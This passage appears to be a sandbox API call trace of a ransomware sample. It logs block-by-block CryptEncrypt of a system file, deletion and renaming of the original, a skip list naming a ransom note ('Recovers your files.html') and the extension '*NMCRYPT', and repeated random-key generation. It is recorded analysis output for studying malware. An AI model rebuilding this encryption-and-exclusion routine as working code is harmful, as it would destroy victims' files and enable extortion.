lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.733] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.733] GetLastError () returned 0x0 [0168.733] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.733] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.733] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.733] GetLastError () returned 0x0 [0168.733] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.734] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.734] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.734] GetLastError () returned 0x0 [0168.734] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.734] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.734] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.734] GetLastError () returned 0x0 [0168.734] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.734] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.734] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.734] GetLastError () returned 0x0 [0168.734] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.735] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.735] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.735] GetLastError () returned 0x0 [0168.735] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.735] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.735] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.735] GetLastError () returned 0x0 [0168.735] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.735] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.735] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.735] GetLastError () returned 0x0 [0168.735] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.735] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.735] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.735] GetLastError () returned 0x0 [0168.735] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.736] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.736] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.736] GetLastError () returned 0x0 [0168.736] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.736] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.736] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.736] GetLastError () returned 0x0 [0168.736] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.736] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.736] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.736] GetLastError () returned 0x0 [0168.736] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.736] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.736] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.736] GetLastError () returned 0x0 [0168.736] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.737] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.737] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0168.737] GetLastError () returned 0x0 [0168.737] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0168.737] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0168.737] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0168.737] GetLastError () returned 0x0 [0168.737] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0168.737] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0168.737] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0168.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui")) returned 0x20 [0168.738] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui", dwFileAttributes=0x20) returned 0 [0168.738] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 1 [0168.738] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui")) returned 0 [0168.739] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" [0168.739] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 1 [0168.739] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX6B6.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx6b6.tmp")) returned 0x6b6 [0168.740] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX6B6.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx6b6.tmp"), dwFlags=0x1) returned 0 [0168.740] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX6B6.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx6b6.tmp")) returned 1 [0168.741] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0168.741] wcslen (_String="OK") returned 0x2 [0168.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.741] CryptDestroyKey (hKey=0x9ad838) returned 1 [0168.741] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0168.741] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0168.741] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*NMCRYPT") returned 0 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.exe") returned 0 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.dll") returned 0 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.lnk") returned 0 [0168.741] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.bat") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.ini") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.msi") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*.scf") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*AppData*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\java\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\windows\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*Atheros*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*Realtek*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*bootmgr*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*boot*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*boot*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*IO.SYS*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*ntldr*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*chrome*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*opera*") returned 0 [0168.742] PathMatchSpecW (pszFile="msadcor.dll.mui", pszSpec="*firefox*") returned 0 [0168.743] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", pszSpec="*") returned 1 [0168.743] strlen (_Str="NMoreira") returned 0x8 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 